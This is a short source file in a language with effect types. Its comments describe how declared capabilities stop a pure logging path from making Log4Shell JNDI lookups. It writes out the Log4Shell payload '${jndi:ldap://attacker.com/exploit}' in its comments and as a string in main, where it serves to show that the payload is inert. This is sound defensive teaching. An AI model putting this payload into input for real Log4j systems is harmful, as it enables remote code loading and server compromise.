// REQ-7: Effects — Capability Tracking
// CVE-2021-44228 Log4Shell / CWE-917: Improper Neutralization in Expression Language
//
// Every function that performs I/O must declare it in its signature.
// A function with no `! Net` declaration is structurally prevented from
// making network calls — calling a Net-effect function from within it
// is a compile error (UndeclaredEffect).
//
// Real-world impact: Log4j evaluated ${jndi:ldap://attacker.com/...} inside
// a log statement. A pure logging formatter with no Net effect cannot trigger
// JNDI lookups by construction — not policy, not runtime check, but type.

type ParsedInput = struct {
    value: String,
    is_valid: Bool,
}

// Pure function: no effects declared — cannot make network calls, period
total fn parse_input(raw: String) -> ParsedInput {
    // Even if raw contains "${jndi:ldap://attacker.com/exploit}",
    // this function cannot evaluate or dispatch it — no Net effect.
    if raw.len() == 0 {
        ParsedInput { value: "", is_valid: false }
    } else {
        ParsedInput { value: raw, is_valid: true }
    }
}

// Only functions that declare ! Console can write output
fn log_result(input: ParsedInput) -> Unit ! Console {
    match input.is_valid {
        true  => println("parsed ok"),
        false => println("empty input rejected"),
    }
}

fn main() -> Unit ! Console {
    // The Log4Shell attack payload — inert here because parse_input has no effects
    let attack: String = "${jndi:ldap://attacker.com/exploit}";
    let parsed: ParsedInput = parse_input(attack);
    log_result(parsed)
}
